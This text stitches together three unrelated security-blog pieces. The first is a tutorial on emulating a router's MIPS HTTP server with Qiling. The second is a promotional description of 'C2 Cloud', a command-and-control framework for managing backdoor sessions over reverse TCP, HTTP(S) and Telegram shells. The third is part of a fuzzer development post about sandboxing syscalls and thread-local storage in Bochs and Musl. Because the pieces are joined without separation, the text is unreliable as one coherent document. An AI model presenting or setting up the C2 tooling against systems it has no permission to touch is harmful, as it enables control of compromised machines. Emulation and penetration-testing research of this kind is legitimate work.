Emulation with Qiling

Qiling is an emulation framework that builds upon the Unicorn emulator by providing higher-level functionality such as dynamic library loading, syscall interception and more.

In this Labs post, we are going to look into Qiling and how it can be used to emulate an HTTP server binary from a router. The target chosen for this research was the NEXXT Polaris 150 travel router.

The firmware was unpacked with binwalk, which found a root filesystem containing lots of MIPS binaries.

HTTPD Startup

Before attempting to emulate the HTTP server, a basic understanding of how the device initialises had to be built. A quick check of the unpacked rcS startup script (under /etc_ro) revealed a helpful comment:

#!/bin/sh

... snip ...

# netctrl : system main process, 
# all others will be invoked by it.
netctrl &

... snip ...

Simple enough. The helpful comment states that netctrl will spawn every other process, which should include the HTTP server. Loading netctrl into Ghidra confirmed this. A call to getCfmValue() is made just before httpd is launched via doSystem().

netctrl doesn’t do much more than launch programs via doSystem().

Having a quick look at httpd (spawned by netctrl) in Ghidra shows that it is a dynamically linked MIPS binary that uses pthreads.

Emulation Journey

When emulating a dynamically linked Linux ELF binary, Qiling requires a root filesystem and the binary itself. The filesystem is managed in a similar way to a chroot environment, so the binary will only have access to the provided filesystem and not the host filesystem (although this can be configured if necessary).

Since binwalk extracted the root filesystem from the firmware already, the root filesystem can simply be passed to Qiling. The code below does just that and then proceeds to run the /bin/httpd binary.

from qiling import Qiling
from qiling.const import *

def main():
  rootfs_path = "_US_Polaris150_V1.0.0.30_EN_NEX01.bin.extracted/_40.extracted/_3E5000.extracted/cpio-root"
  ql = Qiling([rootfs_path + "/bin/httpd"], rootfs_path, multithread=True, verbose=QL_VERBOSE.DEBUG)
  ql.run()

if __name__ == "__main__":
  main()

Passing multithread=True explicitly instructs Qiling to enable threading support for the emulated binary, which is required in this case as httpd uses pthreads.

Starting off with verbose=QL_VERBOSE.DEBUG gives a better understanding of how the binary operates as all syscalls (and arguments) are logged.

Running this code presents an issue. Nothing printed to stdout by httpd is shown in the terminal. The very first line of code in the httpd main function uses puts() to print a banner, yet this output cannot be seen.

This is where Qiling hooks can be very useful. Instead of calling the real puts() function inside the extracted libc, a hook can be used to override the puts() implementation and call a custom Python implementation instead. This is achieved using the set_api() function Qiling provides, as shown in the code snippet below.

def puts_hook(ql: Qiling):
  params = ql.os.resolve_fcall_params({'s': STRING})
  ql.log.warning(f"puts_hook: {params['s']}")
  return 0

def main():

  ... snip ...

  ql.os.set_api("puts", puts_hook, QL_INTERCEPT.CALL)

  ... snip ...

Every call to puts() is now hooked and will call the Python puts_hook() instead. The hook resolves the string argument passed to puts() and then logs it to the terminal. Since QL_INTERCEPT.CALL is used as the last argument to set_api(), only the hook is called and not the real puts() function. Hooks can also be configured to not override the real function by using QL_INTERCEPT.ENTER / QL_INTERCEPT.EXIT instead.
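
As an aside, a non-overriding hook would look roughly like the minimal sketch below, which assumes the same resolve_fcall_params() pattern as above and lets the real puts() run after logging (the puts_enter_hook name is illustrative and not part of the original workflow):

def puts_enter_hook(ql: Qiling):
  # log the argument, then fall through to the real puts() in the extracted libc
  params = ql.os.resolve_fcall_params({'s': STRING})
  ql.log.warning(f"puts called with: {params['s']}")

ql.os.set_api("puts", puts_enter_hook, QL_INTERCEPT.ENTER)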

Running the binary again shows the expected output:

Now the server is running but no ports are open. A simple way to diagnose this is to change the verbosity level in the Qiling constructor to verbose=QL_VERBOSE.DISASM, which will disassemble every instruction as it is run.
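
Concretely, that is just the same constructor as before with a different verbosity value:

ql = Qiling([rootfs_path + "/bin/httpd"], rootfs_path, multithread=True, verbose=QL_VERBOSE.DISASM)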

Emulation hangs on the instruction located at 0x0044a8dc. Navigating to this offset in Ghidra shows a thunk that is calling pthread_create() via the global offset table.

The first cross reference to the thunk comes from the __upgrade() function which is only triggered when a firmware upgrade is requested through the web UI. The second reference comes from the InitWanStatisticTask() function which is always called from the httpd main function. This is likely where the emulation is hanging.

This function doesn’t appear to be critical for the operation of the HTTP server, so it doesn’t necessarily need to be executed.

There are a few ways to tackle this:

  • Hook and override pthread_create() or InitWanStatisticTask()
  • Patch the jump to pthread_create() with a NOP

To demonstrate the patching capabilities of Qiling, the second option was chosen. The jump to pthread_create() happens at 0x00439f3c inside the InitWanStatisticTask() function.

To generate the machine code that represents a MIPS NOP instruction, the Python bindings for the Keystone framework can be used. The NOP bytes can then be written to the emulator memory using the patch() function, as shown below.

def main():

  ... snip ...

  ks = Ks(KS_ARCH_MIPS, KS_MODE_MIPS32)
  nop, _ = ks.asm("NOP")
  ql.patch(0x00439f3c, bytes(nop))

  ... snip ...

The emulator doesn’t hang anymore but instead prints an error. httpd attempts to open /var/run/goahead.pid but the file doesn’t exist.

Looking at the extracted root filesystem, the /var/run/ directory doesn’t exist. Creating the run directory and an empty goahead.pid file inside the extracted root filesystem gets past this error.
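
As a quick sketch, the missing path can be created from the host before launching the emulator (reusing the rootfs_path variable from the earlier snippet):

import os

# create <rootfs>/var/run/goahead.pid inside the extracted root filesystem
run_dir = os.path.join(rootfs_path, "var", "run")
os.makedirs(run_dir, exist_ok=True)
open(os.path.join(run_dir, "goahead.pid"), "w").close()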

Emulation now errors when httpd tries to open /dev/nvram to retrieve the configured LAN IP address.

Searching for the error string initWebs: cannot find lanIpAddr in NVRAM in httpd highlights the following code:

getCfmValue() is called with two arguments: the first is the NVRAM key to retrieve, and the second is a fixed-size output buffer to save the NVRAM value into.

The getCfmValue() function is a wrapper around the nvram_bufget() function from /lib/libnvram-0.9.28.so. Having a closer look at nvram_bufget() shows how /dev/nvram is accessed using ioctl() calls.

Qiling offers a few options to emulate the NVRAM access:

  • Emulate the /dev/nvram file using add_fs_mapper() (see the sketch after this list)
  • Hook ioctl() calls and match on the arguments passed
  • Hook the getCfmValue() function at offset 0x0044a910
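
As an aside, the first option would look roughly like the sketch below. It is a hedged illustration based on Qiling's QlFsMappedObject helper and is not taken from the original research; the FakeNvram class is hypothetical, and a useful version would still have to implement the ioctl() protocol that nvram_bufget() expects:

from qiling.os.mapper import QlFsMappedObject

class FakeNvram(QlFsMappedObject):
  # minimal stub: a real implementation would decode the NVRAM ioctl protocol
  def ioctl(self, ioctl_cmd, ioctl_arg):
    return 0

  def close(self):
    return 0

ql.add_fs_mapper("/dev/nvram", FakeNvram())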

The last option is the most direct and easiest to implement using Qiling hooks. This time the hook_address() function needs to be used, which hooks a specific address rather than a named function (unlike the previously used set_api()).

This means that the hook handler will be called at the target address and then execution will continue as normal. So, to skip over the getCfmValue() implementation, the hook must manually set the program counter to the end of the function by writing to ql.arch.regs.arch_pc.

The body of the handler resolves the NVRAM key and the pointer to the NVRAM value out buffer. A check is made for the key lanIpAddr and if it matches then the string 192.168.1.1 is written to the out buffer.

def getCfmValue_hook(ql: Qiling):
  params = ql.os.resolve_fcall_params(
    {
      'key': STRING,
      'out_buf': POINTER
    }
  )

  nvram_key = params["key"]
  nvram_value = ""
  if nvram_key == "lanIpAddr":
    nvram_value = "192.168.1.1"

  ql.log.warning(f"===> getCfmValue_hook: {nvram_key} -> {nvram_value}")

  # save the fake NVRAM value into the out parameter
  ql.mem.string(params["out_buf"], nvram_value)

  # force return from getCfmValue
  ql.arch.regs.arch_pc = 0x0044a92c

def main():

  ... snip ...

  ql.hook_address(getCfmValue_hook, 0x0044a910)

  ... snip ...

httpd now runs for a few seconds then crashes with an [Errno 11] Resource temporarily unavailable error. The error message comes from Qiling and relates to the ql_syscall_recv() handler, which is responsible for emulating the recv() syscall.

Error number 11 translates to EWOULDBLOCK / EAGAIN, which is triggered when a read is attempted on a non-blocking socket but no data is available, meaning the read would block. To configure non-blocking mode the fcntl() syscall is generally used, which sets the O_NONBLOCK flag on the socket. Looking for cross references to this syscall highlighted the following function at 0x004107c8:

socketSetBlock() takes a socket file descriptor and a boolean to disable non-blocking mode on the file descriptor. The current file descriptor flags are retrieved at line 17 or 24 and the O_NONBLOCK flag is set / cleared at line 20 or 27. Finally, the new flags value is set for the socket at line 30 with a call to fcntl().

This function is an ideal candidate for hooking to ensure that O_NONBLOCK is never enabled. Hooking socketSetBlock() and forcing the disable_non_block argument to any non-zero value should make the function always disable O_NONBLOCK.

Inside the socketSetBlock_hook the disable_non_block argument is set to 1 by directly modifying the value inside the a1 register:

def socketSetBlock_hook(ql: Qiling):
    ql.log.warning("===> socketSetBlock_hook: disabling O_NONBLOCK")
    # force disable_non_block
    ql.arch.regs.a1 = 1

def main():
    ... snip ...
    ql.hook_address(socketSetBlock_hook, 0x004107c8)
    ... snip ...

If this helper function didn’t exist then the fcntl() syscall would need to be hooked using the set_syscall() function from Qiling.
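
A rough sketch of that approach is shown below. This is an assumption-heavy illustration: the fcntl_hook name is made up, the syscall may be named fcntl or fcntl64 depending on the target ABI, and a real replacement handler would need to emulate or forward every other fcntl command correctly:

def fcntl_hook(ql: Qiling, fd: int, cmd: int, arg: int):
    # replacement handler: F_SETFL / O_NONBLOCK is simply never applied,
    # so the socket stays in blocking mode
    ql.log.warning(f"fcntl_hook: fd={fd} cmd={cmd:#x} arg={arg:#x}")
    return 0

ql.os.set_syscall("fcntl64", fcntl_hook, QL_INTERCEPT.CALL)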

Running the emulator again opens up port 8080! Navigating to localhost:8080 in a web browser loads a partially rendered login page and then the emulator crashes.

The logs show an Invalid memory write inside a specific thread. There aren’t many details to go on.

Since this error originates from the main thread and the emulated binary is effectively single-threaded (after the NOP patch), the multithread argument passed to the Qiling constructor was changed to False.

Restarting the emulation and reloading the login page worked without crashing!

NVRAM stores the password which is retrieved using the previously hooked getCfmValue() function. After returning a fake password from getCfmValue_hook() the device can be logged into.

def getCfmValue_hook(ql: Qiling):
    ... snip ...
    elif nvram_key == "Password":
        nvram_value = "password"
    ... snip ...

Logging in causes the emulator to crash once again. This time, /proc/net/arp is expected to exist but the root filesystem doesn’t contain it.

Simply creating this file in the root filesystem fixes this issue.

After re-running the emulation, everything seems to be working. The webpages can be navigated without the emulator crashing! To make the pages fully functional, the required NVRAM values must exist, which is an easy fix using the getCfmValue_hook.

Conclusion

Hopefully this Labs post gave a useful insight into some of the capabilities of Qiling. Qiling has many more features not covered here, including support for emulating bare metal binaries, GDB server integration, snapshots, fuzzing, code coverage and much more.

Finally, a few things to note:

  • Multithreading support isn’t perfect
  • More often than not, Qiling will fail to handle multiple threads correctly
  • Privileged ports are remapped to the original port + 8000 unless the emulation is run as a privileged user
  • Reducing the verbosity with the verbose parameter can significantly speed up execution
  • Qiling documentation is often missing or outdated

The full code used throughout this article can be found below:

from qiling import Qiling
from qiling.const import *
from qiling.os.const import *
from qiling.os.posix.syscall import *
from keystone import *


def puts_hook(ql: Qiling):
    params = ql.os.resolve_fcall_params({'s': STRING})
    ql.log.warning(f"===> puts_hook: {params['s']}")
    return 0


def getCfmValue_hook(ql: Qiling):
    params = ql.os.resolve_fcall_params(
        {
            'key': STRING,
            'out_buf': POINTER
        }
    )

    nvram_key = params["key"]
    nvram_value = ""
    if nvram_key == "lanIpAddr":
        nvram_value = "192.168.1.1"
    elif nvram_key == "wanIpAddr":
        nvram_value = "1.2.3.4"
    elif nvram_key == "workMode":
        nvram_value = "router"
    elif nvram_key == "Login":
        nvram_value = "admin"
    elif nvram_key == "Password":
        nvram_value = "password"

    ql.log.warning(f"===> getCfmValue_hook: {nvram_key} -> {nvram_value}")

    # save the fake NVRAM value into the out parameter
    ql.mem.string(params["out_buf"], nvram_value)
    # force return from getCfmValue
    ql.arch.regs.arch_pc = 0x0044a92c


def socketSetBlock_hook(ql: Qiling):
    ql.log.warning(f"===> socketSetBlock_hook: disabling O_NONBLOCK")
    # force disable_non_block
    ql.arch.regs.a1 = 1


def main():
    rootfs_path = "_US_Polaris150_V1.0.0.30_EN_NEX01.bin.extracted/_40.extracted/_3E5000.extracted/cpio-root"
    ql = Qiling([rootfs_path + "/bin/httpd"], rootfs_path, multithread=False, verbose=QL_VERBOSE.DEBUG)

    ql.os.set_api("puts", puts_hook, QL_INTERCEPT.CALL)

    # patch pthread_create() call in `InitWanStatisticTask`
    ks = Ks(KS_ARCH_MIPS, KS_MODE_MIPS32)
    nop, _ = ks.asm("NOP")
    ql.patch(0x00439f3c, bytes(nop))

    ql.hook_address(getCfmValue_hook, 0x0044a910)
    ql.hook_address(socketSetBlock_hook, 0x004107c8)

    ql.run()


if __name__ == "__main__":
    main()

The post Emulation with Qiling appeared first on LRQA Nettitude Labs.

C2-Cloud - The C2 Cloud Is A Robust Web-Based C2 Framework, Designed To Simplify The Life Of Penetration Testers


The C2 Cloud is a robust web-based C2 framework, designed to simplify the life of penetration testers. It allows easy access to compromised backdoors, just like accessing an EC2 instance in the AWS cloud. It can manage several simultaneous backdoor sessions with a user-friendly interface.

C2 Cloud is open source. Security analysts can confidently perform simulations, gaining valuable experience and contributing to the proactive defense posture of their organizations.

Supported reverse shells:

  1. Reverse TCP
  2. Reverse HTTP
  3. Reverse HTTPS (configure it behind an LB)
  4. Telegram C2

Demo

C2 Cloud walkthrough: https://youtu.be/hrHT_RDcGj8
Ransomware simulation using C2 Cloud: https://youtu.be/LKaCDmLAyvM
Telegram C2: https://youtu.be/WLQtF4hbCKk

Key Features

🔒 Anywhere Access: Reach the C2 Cloud from any location.
🔄 Multiple Backdoor Sessions: Manage and support multiple sessions effortlessly.
🖱️ One-Click Backdoor Access: Seamlessly navigate to backdoors with a simple click.
📜 Session History Maintenance: Track and retain complete command and response history for comprehensive analysis.

Tech Stack

🛠️ Flask: Serving web and API traffic, facilitating reverse HTTP(s) requests.
🔗 TCP Socket: Serving reverse TCP requests for enhanced functionality.
🌐 Nginx: Effortlessly routing traffic between web and backend systems.
📨 Redis PubSub: Serving as a robust message broker for seamless communication.
🚀 Websockets: Delivering real-time updates to browser clients for enhanced user experience.
💾 Postgres DB: Ensuring persistent storage for seamless continuity.

Architecture

Application setup

  • Management port: 9000
  • Reverse HTTP port: 8000
  • Reverse TCP port: 8888

  • Clone the repo

  • Optional: Update chait_id, bot_token in c2-telegram/config.yml
  • Execute docker-compose up -d to start the containers. Note: the c2-api service will not start up until the database is initialized. If you receive 500 errors, please try again after some time.

Credits

Inspired by Villain, a CLI-based C2 developed by Panagiotis Chartas.

License

Distributed under the MIT License. See LICENSE for more information.

Contact



Fuzzer Development 3: Building Bochs, MMU, and File I/O

By: h0mbre

Background

This is the next installment in a series of blogposts detailing the development process of a snapshot fuzzer that aims to utilize Bochs as a target execution engine. You can find the fuzzer and code in the Lucid repository.

Introduction

We’re continuing today on our journey to develop our fuzzer. Last time we left off, we had developed the beginnings of a context-switching infrastructure so that we could sandbox Bochs (really a test program) from touching the OS kernel during syscalls.

In this post, we’re going to go over some changes and advancements we’ve made to the fuzzer and also document some progress related to Bochs itself.

Syscall Infrastructure Update

After putting out the last blogpost, I got some really good feedback and suggestions from Fuzzing discord legend WorksButNotTested, who informed me that we could cut down on a lot of complexity if we scrapped the full context-switching/C-ABI-to-Syscall-ABI register translation routines altogether and simply had Bochs call a Rust function from C for syscalls. This is very intuitive and obvious in hindsight and I’m admittedly a little embarrassed to have overlooked this possibility.

Previously, in our custom Musl code, we would have a C function call like so:

static __inline long __syscall6(long n, long a1, long a2, long a3, long a4, long a5, long a6)
{
	unsigned long ret;
	register long r10 __asm__("r10") = a4;
	register long r8 __asm__("r8") = a5;
	register long r9 __asm__("r9") = a6;
	__asm__ __volatile__ ("syscall" : "=a"(ret) : "a"(n), "D"(a1), "S"(a2),
						  "d"(a3), "r"(r10), "r"(r8), "r"(r9) : "rcx", "r11", "memory");
	return ret;
}

This is the function that is called when the program needs to make a syscall with 6 arguments. In the previous blog, we changed this function to be an if/else such that if the program was running under Lucid, we would instead call into Lucid’s context-switch function after shuffling the C ABI registers to Syscall registers like so:

static __inline long __syscall6_original(long n, long a1, long a2, long a3, long a4, long a5, long a6)
{
	unsigned long ret;
	register long r10 __asm__("r10") = a4;
	register long r8  __asm__("r8")  = a5;
	register long r9  __asm__("r9")  = a6;
	__asm__ __volatile__ ("syscall" : "=a"(ret) : "a"(n), "D"(a1), "S"(a2), "d"(a3), "r"(r10),
							"r"(r8), "r"(r9) : "rcx", "r11", "memory");

	return ret;
}

static __inline long __syscall6(long n, long a1, long a2, long a3, long a4, long a5, long a6)
{
    if (!g_lucid_ctx) { return __syscall6_original(n, a1, a2, a3, a4, a5, a6); }
	
    register long ret;
    register long r12 __asm__("r12") = (size_t)(g_lucid_ctx->exit_handler);
    register long r13 __asm__("r13") = (size_t)(&g_lucid_ctx->register_bank);
    register long r14 __asm__("r14") = SYSCALL;
    register long r15 __asm__("r15") = (size_t)(g_lucid_ctx);
    
    __asm__ __volatile__ (
        "mov %1, %%rax\n\t"
	"mov %2, %%rdi\n\t"
	"mov %3, %%rsi\n\t"
	"mov %4, %%rdx\n\t"
	"mov %5, %%r10\n\t"
	"mov %6, %%r8\n\t"
	"mov %7, %%r9\n\t"
        "call *%%r12\n\t"
        "mov %%rax, %0\n\t"
        : "=r" (ret)
        : "r" (n), "r" (a1), "r" (a2), "r" (a3), "r" (a4), "r" (a5), "r" (a6),
		  "r" (r12), "r" (r13), "r" (r14), "r" (r15)
        : "rax", "rcx", "r11", "memory"
    );
	
	return ret;
}

So this was quite involved. I was very fixated on the idea that “Lucid has to be the kernel. And when userland programs execute a syscall, their state is saved and execution is started in the kernel”. This led me astray, since such a complicated routine is not needed for our purposes: we are not actually a kernel, we just want to sandbox away syscalls for one specific program that behaves pretty well. WorksButNotTested instead suggested just calling a Rust function like so:

static __inline long __syscall6(long n, long a1, long a2, long a3, long a4, long a5, long a6)
{
	if (g_lucid_syscall)
		return g_lucid_syscall(g_lucid_ctx, n, a1, a2, a3, a4, a5, a6);
	
	unsigned long ret;
	register long r10 __asm__("r10") = a4;
	register long r8 __asm__("r8") = a5;
	register long r9 __asm__("r9") = a6;
	__asm__ __volatile__ ("syscall" : "=a"(ret) : "a"(n), "D"(a1), "S"(a2),
						  "d"(a3), "r"(r10), "r"(r8), "r"(r9) : "rcx", "r11", "memory");
	return ret;
}

Obviously this is a much simpler solution and we get to avoid scrambling registers/saving state/inline-assembly and the rest of it. To set this function up, we simply created a new function pointer global variable in lucid.h in Musl and gave it a definition in src/lucid.c, which you can see in the Musl patches in the repo. g_lucid_syscall looks like this on the Rust side:

pub extern "C" fn lucid_syscall(contextp: *mut LucidContext, n: usize,
    a1: usize, a2: usize, a3: usize, a4: usize, a5: usize, a6: usize)
    -> u64 

We get to use the C ABI to our advantage and maintain the semantics of how a program would normally use Musl, and it’s just a very much appreciated suggestion and I couldn’t be happier with how it turned out.

Calling Convention Changes

During this refactoring for syscalls, I also simplified the way our context-switching calling convention would work. Instead of using 4 separate registers for the calling convention, I decided it was doable by just passing a pointer to the Lucid execution context and having the context_switch function itself work out how it should behave based on the context’s values. In essence, we’re moving complexity from the caller-side to the callee-side. This means that the complexity doesn’t keep recurring throughout the codebase; it is encapsulated one time, in the context_switch logic itself. This does require some hacky/brittle code however; for instance, we have to hardcode some struct offsets for the Lucid execution data structure, but that is a small price to pay in my opinion for drastically reduced complexity. The context_switch code has been changed to the following:

extern "C" { fn context_switch(); }
global_asm!(
    ".global context_switch",
    "context_switch:",

    // Save the CPU flags before we do any operations
    "pushfq",

    // Save registers we use for scratch
    "push r14",
    "push r13",

    // Determine what execution mode we're in
    "mov r14, r15",
    "add r14, 0x8",     // mode is at offset 0x8 from base
    "mov r14, [r14]",
    "cmp r14d, 0x0",
    "je save_bochs",

    // We're in Lucid mode so save Lucid GPRs
    "save_lucid: ",
    "mov r14, r15",
    "add r14, 0x10",    // lucid_regs is at offset 0x10 from base
    "jmp save_gprs",             

    // We're in Bochs mode so save Bochs GPRs
    "save_bochs: ",
    "mov r14, r15",
    "add r14, 0x90",    // bochs_regs is at offset 0x90 from base
    "jmp save_gprs",

You can see that once we hit the context_switch function we save the CPU flags before we do anything that would affect them, then we save a couple of registers that we use as scratch registers. Then we’re free to check the value of context->mode in order to determine what mode of execution we’re in. Based on that value, we are able to know what register bank to use to save our general-purpose registers. So yes, we do have to hardcode some offsets, but I believe overall this is a much better API and system for context-switching callees and the data-structure itself should be relatively stable at this point and not require massive refactoring.

Introducing Faults

Since the last blogpost, I’ve introduced the concept of Fault, which is an error class reserved for instances where some sort of error is encountered during either context-switching code or syscall handling. This error is distinct from our highest-level error LucidErr. Ultimately, these faults are plumbed back up to Lucid when they are encountered so that Lucid can handle them. As of this moment, Lucid treats any Fault as fatal.

We are able to plumb these back up to Lucid because before starting Bochs execution we now save Lucid’s state and context-switch into starting Bochs:

#[inline(never)]
pub fn start_bochs(context: &mut LucidContext) {
    // Set the execution mode and the reason why we're exiting the Lucid VM
    context.mode = ExecMode::Lucid;
    context.exit_reason = VmExit::StartBochs;

    // Set up the calling convention and then start Bochs by context switching
    unsafe {
        asm!(
            "push r15", // Callee-saved register we have to preserve
            "mov r15, {0}", // Move context into R15
            "call qword ptr [r15]", // Call context_switch
            "pop r15",  // Restore callee-saved register
            in(reg) context as *mut LucidContext,
        );
    }
}

We make some changes to the execution context, namely marking the execution mode (Lucid-mode) and setting the reason why we’re context-switching (to start Bochs). Then in the inline assembly, we call the function pointer at offset 0 in the execution context structure:

// Execution context that is passed between Lucid and Bochs that tracks
// all of the mutable state information we need to do context-switching
#[repr(C)]
#[derive(Clone)]
pub struct LucidContext {
    pub context_switch: usize,  // Address of context_switch()

So then our Lucid state is saved in the context_switch routine and we are then passed to this logic:

// Handle Lucid context switches here
    if LucidContext::is_lucid_mode(context) {
        match exit_reason {
            // Dispatch to Bochs entry point
            VmExit::StartBochs => {
                jump_to_bochs(context);
            },
            _ => {
                fault!(context, Fault::BadLucidExit);
            }
        }
    }

Finally, we call jump_to_bochs:

// Standalone function to literally jump to Bochs entry and provide the stack
// address to Bochs
fn jump_to_bochs(context: *mut LucidContext) {
    // RDX: we have to clear this register as the ABI specifies that exit
    // hooks are set when rdx is non-null at program start
    //
    // RAX: arbitrarily used as a jump target to the program entry
    //
    // RSP: Rust does not allow you to use 'rsp' explicitly with in(), so we
    // have to manually set it with a `mov`
    //
    // R15: holds a pointer to the execution context, if this value is non-
    // null, then Bochs learns at start time that it is running under Lucid
    //
    // We don't really care about execution order as long as we specify clobbers
    // with out/lateout, that way the compiler doesn't allocate a register we 
    // then immediately clobber
    unsafe {
        asm!(
            "xor rdx, rdx",
            "mov rsp, {0}",
            "mov r15, {1}",
            "jmp rax",
            in(reg) (*context).bochs_rsp,
            in(reg) context,
            in("rax") (*context).bochs_entry,
            lateout("rax") _,   // Clobber (inout so no conflict with in)
            out("rdx") _,       // Clobber
            out("r15") _,       // Clobber
        );
    }
}

Full-blown context-switching like this allows us to encounter a Fault and then pass that error back to Lucid for handling. In the fault_handler, we set the Fault type in the execution context, and then we attempt to restore execution back to Lucid:

// Where we handle faults that may occur when context-switching from Bochs. We
// just want to make the fault visible to Lucid so we set it in the context,
// then we try to restore Lucid execution from its last-known good state
pub fn fault_handler(contextp: *mut LucidContext, fault: Fault) {
    let context = unsafe { &mut *contextp };
    match fault {
        Fault::Success => context.fault = Fault::Success,
        ...
    }

    // Attempt to restore Lucid execution
    restore_lucid_execution(contextp);
}

// We use this function to restore Lucid execution to its last known good state
// This is just really trying to plumb up a fault to a level that is capable of
// discerning what action to take. Right now, we probably just call it fatal. 
// We don't really deal with double-faults, it doesn't make much sense at the
// moment when a single-fault will likely be fatal already. Maybe later?
fn restore_lucid_execution(contextp: *mut LucidContext) {
    let context = unsafe { &mut *contextp };
    
    // Fault should be set, but change the execution mode now since we're
    // jumping back to Lucid
    context.mode = ExecMode::Lucid;

    // Restore extended state
    let save_area = context.lucid_save_area;
    let save_inst = context.save_inst;
    match save_inst {
        SaveInst::XSave64 => {
            // Retrieve XCR0 value, this will serve as our save mask
            let xcr0 = unsafe { _xgetbv(0) };

            // Call xrstor to restore the extended state from Bochs save area
            unsafe { _xrstor64(save_area as *const u8, xcr0); }             
        },
        SaveInst::FxSave64 => {
            // Call fxrstor to restore the extended state from Bochs save area
            unsafe { _fxrstor64(save_area as *const u8); }
        },
        _ => (), // NoSave
    }

    // Next, we need to restore our GPRs. This is kind of different order than
    // returning from a successful context switch since normally we'd still be
    // using our own stack; however right now, we still have Bochs' stack, so
    // we need to recover our own Lucid stack which is saved as RSP in our 
    // register bank
    let lucid_regsp = &context.lucid_regs as *const _;

    // Move that pointer into R14 and restore our GPRs. After that we have the
    // RSP value that we saved when we called into context_switch, this RSP was
    // then subtracted from by 0x8 for the pushfq operation that comes right
    // after. So in order to recover our CPU flags, we need to manually sub
    // 0x8 from the stack pointer. Pop the CPU flags back into place, and then 
    // return to the last known good Lucid state
    unsafe {
        asm!(
            "mov r14, {0}",
            "mov rax, [r14 + 0x0]",
            "mov rbx, [r14 + 0x8]",
            "mov rcx, [r14 + 0x10]",
            "mov rdx, [r14 + 0x18]",
            "mov rsi, [r14 + 0x20]",
            "mov rdi, [r14 + 0x28]",
            "mov rbp, [r14 + 0x30]",
            "mov rsp, [r14 + 0x38]",
            "mov r8, [r14 + 0x40]",
            "mov r9, [r14 + 0x48]",
            "mov r10, [r14 + 0x50]",
            "mov r11, [r14 + 0x58]",
            "mov r12, [r14 + 0x60]",
            "mov r13, [r14 + 0x68]",
            "mov r15, [r14 + 0x78]",
            "mov r14, [r14 + 0x70]",
            "sub rsp, 0x8",
            "popfq",
            "ret",
            in(reg) lucid_regsp,
        );
    }
}

As you can see, restoring Lucid state and resuming execution is quite involved. One tricky thing we had to deal with was the fact that right now, when a Fault occurs, we are likely operating in Bochs mode, which means that our stack is Bochs’ stack and not Lucid’s. So even though this is technically just a context-switch, we had to change the order around a little bit to pop Lucid’s saved state into our current state and resume execution. Now when Lucid calls functions that context-switch, it can simply check the “return” value of such functions by checking if there was a Fault noted in the execution context, like so:

	// Start executing Bochs
    prompt!("Starting Bochs...");
    start_bochs(&mut lucid_context);

    // Check to see if any faults occurred during Bochs execution
    if !matches!(lucid_context.fault, Fault::Success) {
        fatal!(LucidErr::from_fault(lucid_context.fault));
    }

Pretty neat imo!

Sandboxing Thread-Local-Storage

Coming into this project, I honestly didn’t know much about thread-local-storage (TLS) except that it was some magic per-thread area of memory that did stuff. That is still the entirety of my knowledge really, except now I’ve seen some code that allocates that memory and initializes it, which helps me appreciate what is really going on. Once I implemented the Fault system discussed above, I noticed that Lucid would segfault when exiting. After some debugging, I realized it was calling a function pointer that was a bogus address. How could this have happened? Well, after some digging, I noticed that right before that function call, an offset of the fs register was used to load the address from memory. Typically, fs is used to access TLS. So at that point, I had a strong suspicion that Bochs had somehow corrupted the value of my fs register. So I did a quick grep through Musl looking for fs register access and found the following:

/* Copyright 2011-2012 Nicholas J. Kain, licensed under standard MIT license */
.text
.global __set_thread_area
.hidden __set_thread_area
.type __set_thread_area,@function
__set_thread_area:
	mov %rdi,%rsi           /* shift for syscall */
	movl $0x1002,%edi       /* SET_FS register */
	movl $158,%eax          /* set fs segment to */
	syscall                 /* arch_prctl(SET_FS, arg)*/
	ret

So this function, __set_thread_area, uses an inline syscall instruction to call arch_prctl to directly manipulate the fs register. This made a lot of sense because, if the syscall instruction was indeed executed, we wouldn’t intercept it with our syscall sandboxing infrastructure, since we never instrumented it; we’ve only instrumented what boils down to the syscall() function wrapper in Musl. So this would escape our sandbox and directly manipulate fs. Sure enough, I discovered that this function is called during TLS initialization in src/env/__init_tls.c:

int __init_tp(void *p)
{
	pthread_t td = p;
	td->self = td;
	int r = __set_thread_area(TP_ADJ(p));
	if (r < 0) return -1;
	if (!r) libc.can_do_threads = 1;
	td->detach_state = DT_JOINABLE;
	td->tid = __syscall(SYS_set_tid_address, &__thread_list_lock);
	td->locale = &libc.global_locale;
	td->robust_list.head = &td->robust_list.head;
	td->sysinfo = __sysinfo;
	td->next = td->prev = td;
	return 0;
}

So in this __init_tp function, we’re given a pointer, we call the TP_ADJ macro to do some arithmetic on the pointer, and we pass that value to __set_thread_area so that fs is manipulated. Great, now how do we sandbox this? I wanted to avoid messing with the inline assembly in __set_thread_area itself, so I just changed the source so that Musl would instead utilize the syscall() wrapper function, which calls our instrumented syscall functions under the hood, like so:

#ifndef ARCH_SET_FS
#define ARCH_SET_FS 0x1002
#endif /* ARCH_SET_FS */

int __init_tp(void *p)
{
	pthread_t td = p;
	td->self = td;
	int r = syscall(SYS_arch_prctl, ARCH_SET_FS, TP_ADJ(p));
	//int r = __set_thread_area(TP_ADJ(p));

Now, we can intercept this syscall in Lucid and effectively do nothing really. As long as there are no other direct accesses to fs (and there might still be!), we should be fine here. I also adjusted the Musl code so that if we’re running under Lucid, we provide a TLS area via the execution context by just creating a mock area of what Musl calls the builtin_tls:

static struct builtin_tls {
	char c;
	struct pthread pt;
	void *space[16];
} builtin_tls[1];

So now, when __init_tp is called, the pointer it is given points to our own TLS block of memory we’ve created in the execution context, so that we now have access to things like errno in Lucid:

if (libc.tls_size > sizeof builtin_tls) {
#ifndef SYS_mmap2
#define SYS_mmap2 SYS_mmap
#endif
		__asm__ __volatile__ ("int3"); // Added by me just in case
		mem = (void *)__syscall(
			SYS_mmap2,
			0, libc.tls_size, PROT_READ|PROT_WRITE,
			MAP_ANONYMOUS|MAP_PRIVATE, -1, 0);
		/* -4095...-1 cast to void * will crash on dereference anyway,
		 * so don't bloat the init code checking for error codes and
		 * explicitly calling a_crash(). */
	} else {
		// Check to see if we're running under Lucid or not
		if (!g_lucid_ctx) { mem = builtin_tls; }
		else { mem = &g_lucid_ctx->tls; }
	}

	/* Failure to initialize thread pointer is always fatal. */
	if (__init_tp(__copy_tls(mem)) < 0)
		a_crash();

The mock TLS area is defined on the Rust side in the execution context like this:

#[repr(C)]
#[derive(Clone)]
pub struct Tls {
    padding0: [u8; 8], // char c
    padding1: [u8; 52], // Padding to offset of errno which is 52-bytes
    pub errno: i32,
    padding2: [u8; 144], // Additional padding to get to 200-bytes total
    padding3: [u8; 128], // 16 void * values
}

